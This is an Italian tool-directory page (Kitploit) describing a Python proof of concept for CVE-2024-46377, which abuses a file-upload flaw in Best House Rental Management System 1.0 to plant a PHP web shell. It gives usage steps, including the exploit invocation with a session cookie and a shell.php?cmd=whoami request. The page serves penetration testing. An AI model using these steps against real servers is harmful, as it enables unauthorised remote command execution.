Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-46377 — Script PoC in Python che sfrutta una vulnerabilità di caricamento file arbitrario in Best House Rental Management System 1.0 per caricare una web shell PHP ed eseguire comandi remoti. | Kitploit
Strumenti/GitHubGitHub/vidura2/cve-2024-46377
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubvidura2/cve-2024-46377

CVE-2024-46377

Script PoC in Python che sfrutta una vulnerabilità di caricamento file arbitrario in Best House Rental Management System 1.0 per caricare una web shell PHP ed eseguire comandi remoti.

Vedi Repository
2101 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-46377

PoC per la vulnerabilità di upload arbitrario di file in Best House Rental Management System 1.0

Panoramica

Questo script Python dimostra come sfruttare la vulnerabilità di upload arbitrario di file in Best House Rental Management System 1.0. La vulnerabilità consente a un malintenzionato di caricare un file dannoso (come una web shell PHP) ed eseguire comandi arbitrari sul server di destinazione.

Utilizzo

  1. Clonare il repository e navigare nella directory:

    root@kitploit:~
    git clone https://github.com/yourusername/house-rental-poc.git
    cd house-rental-poc
    

    Eseguire l'exploit con i seguenti parametri:

    root@kitploit:~
    python exploit_house_rental.py <target_url> <file_upload_path> <session_cookie>
    
    • target_url: L'URL della pagina vulnerabile di upload file (es. )
http://<target-site>/rental/admin_class.php?view=save_settings
  • file_upload_path: Il percorso in cui vengono memorizzati i file caricati (es. http://<target-site>/path/to/uploaded/files)
  • session_cookie: Il cookie di sessione dell'utente autenticato
  • Se ha successo, sarà possibile eseguire comandi sul server di destinazione visitando:

    root@kitploit:~
    http://<file_upload_path>/shell.php?cmd=whoami
    

    Testare eseguendo comandi come whoami o uname -a.

    Esempio

    root@kitploit:~
    python exploit_house_rental.py http://127.0.0.1/rental/admin_class.php?view=save_settings http://127.0.0.1/uploads/ SESSION_ID=123456789
    

    Questo codice è rilasciato sotto licenza MIT.

    Scarica lo strumento